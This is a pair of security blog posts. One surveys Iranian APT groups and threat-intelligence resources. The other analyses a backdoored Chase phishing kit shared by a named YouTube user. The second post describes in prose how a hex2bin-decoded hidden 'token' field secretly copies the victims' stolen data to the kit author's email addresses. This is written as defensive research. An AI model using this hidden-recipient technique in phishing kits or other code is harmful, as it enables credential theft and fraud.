Thursday, January 09, 2020

Iranian APT Group Overview

Today the Birmingham InfraGard Chapter and the Alabama ISSA held a joint meeting featuring a presentation from the Cybersecurity & Infrastructure Security Agency, part of DHS that was formerly known as the NPPD.  I learned of a ton of offerings from at the meeting, so I want to start by sharing a link to their CISA Insights Page, where they released earlier this week some guidelines for updating your company's Risk Assessment regarding potential cyber or physical threats from Iranian actors in light of our current political situation, and the tendency of the Iranian regime to lash out with Cyber attacks when they can't accomplish what they want with the limited reach of their military.  That Insight was called Increased Geopolitical Tensions and Threats and features ten readiness steps for making sure your org is not a soft target for cyber attacks from Iran. Most of these are things you should be doing anyway, but hey, an Iran threat is possibly a good time to go check those out!  One way of thinking about covering your cyber bases that I really like is actually from the Australian Government, who recommends their "Essential 8" Strategies to Mitigate Cyber Security Incidents.  Start with making sure you have your Essentials covered, but then move on to "Very Good" and "Excellent" steps as your org matures your security practices.

However, we all know that Iran has many Advanced Persistent Threat (APT) Groups, and that there is much more to watching for such activity then patching your systems and telling your users to be aware.  A large org will want to know more about the behaviors of documented Iranian APT Groups. Often these insights include known malware families used by the actor, or what sectors or countries this threat group historically has attacked.

I've seen several documents that share a woefully incomplete list of APT groups from Iran, so I've tried to pull together some helpful links to the main groups below.  In each case, if their is a "MITRE Group #" after the main title, you will find a very robust list of TTPs (Tactics, Techniques, and Procedures) about the group and links to many more reports and resources about the group than I have provided below.  However, I DO like the reports I've listed and think you might want to read them as part of "basic understanding" before following a dozen reports about the same group.  One slight complaint about the MITRE data, and APT Group Naming in general, is there is a great deal of disagreement about which group names are aliases for the same groups, and which may be entirely different groups that just share some tools with one another.  Hey, I'm doing the best I can here, and so is MITRE.  It's tricky!  If you feel I've really got something screwed up, leave a comment!  Let's chat!

Most every vendor it seems likes to put their own personal spin on APT Groups.  I have to confess to being a sucker for the CrowdStrike naming conventions (Hi Adam! Hi Dmitri! Hi Shawn!).  They use a different Animal to label each APT Group based on the name of the country where the group is hosted.  Their name for Iran is "Kitten" (as in "Persian Kitten", get it?)

While there are several excellent APT Disambiguation efforts, my favorite for ease of use is the one run by Florian Roth (Twitter @Cyb3rops ) - APT Groups and Operations.  Go to the Iran tab. There are columns for malware sets and links related to each group as well.

If you prefer a much more detailed read of APT Groups, the ThaiCERT has an amazing Threat Actor Encyclopedia! A 275 page omnibus of APT!  However, it is really tricky to pull out, for example, JUST the Iran stuff from it.

For now, I'll organize this by the CrowdStrike Kitten Names. Their set includes at least:

but there are many other companies naming other Iranian APT Groups that may or may not link up with the Kittens.  FireEye is the main user of the numbered APT Groups.  Many of these now have a "Kitten" name as you see above ... APT33, 34, 35, and 39 are all Iranian.  There are several "less well labeled" actors who either don't really behave like traditional APT, or haven't been as widely linked as those above, but are still serious.  A few of those below:
  • Cyber Fighters of Izz Ad-Din Al Qassam - the bank DDOS guys.  
  • DarkHydrus (AKA Lazy Meerkat) - some say is actually also Slayer Kitten, others disagree
  • Gold Iowell (AKA Boss Spider) - these are the SamSam Ransomware guys 

If it would be helpful to just have the MITRE links all in one place, here you go!

Thursday, January 02, 2020

Backdoored Phishing Kits are still popular

What did you do for the holidays?  If you're a cybercrime geek you probably took advantage of some of the extra time on your hands to investigate some new phishing sites, right?

Jone Fredrick is the type of Facebook user who is quite open about his criminal activity.  He boasts about his phishing skills by having a Facebook profile picture of someone taking a selfie showing their government issued ID and their credit card!  He claims to live in Blida, Algeria, and probably does.  Over the holidays Jone update his YouTube channel, "mr azert" with a new Chase Bank phishing kit.  (Phishers don't call this phishing.  They call it "bank scams" or "scam pages."

In the past two weeks, Jone, who uses the alias "Mr Azert", has uploaded several videos about his new scam pages to his YouTube channel.  Chase, Spotify, Dropbox, Alibaba, and Paypal all have new scam pages courtesy of Mr Azert.  How generous that he just gives them away for free!

After listening to so much bad gangster/scammer rap music, it was nice to hear some Algerian rap while I did my investigation.  Mr Azert confirms this is him by replying to "Tutor Arena421" giving him his email address ( and Facebook address ( jone.fredrick.79).

Of course, we report the offending content to YouTube.  If you ever encounter the same, please use the "Report" function.  The correct flow is to click the "Three Dots" ... then "Report".  Then choose  "Spam or misleading" and then the subcategory "Scams / fraud"

In this case, the reason Mr Azert is giving away these phishing kits is that he has backdoored all of the kits.  We'll look at the Chase one first.   There are five separate PHP files that send the various stolen information back to the person using the kit.  

When we look at the actual "Send" command, we notice that the email command says "for each $send" ... but the instructions for the kit have told the kit downloader that they should include their own email address in a certain place, which is "import"ed into this code.  What other address is being used here?

If we scroll up about we see that $send is receiving a variable called "token" from the form post that called this PHP code, and then converting it into ASCII with "hex2bin".

The calling code in this case is "myaccount.php" which seems to do some "input validation" but in reality, is also loading the "token" value:

That hex string at the bottom starting with "6665" is decoded in the "hex2bin" call into a pair of email addresses:  and

So, anyone who downloads Mr Azert's kit is going to either create or hack a website, upload and unpack the kit, spam out links to that URL, and then have all of their stolen data go back to Mr Azert in Algeria, who is likely to be better at cashing out the information than someone too lame to make their own phishing kit.

We're of course reporting all of this to YouTube, Gmail, Yahoo, and Facebook ... 

So how did you spend YOUR holiday?  

Happy New Year everyone!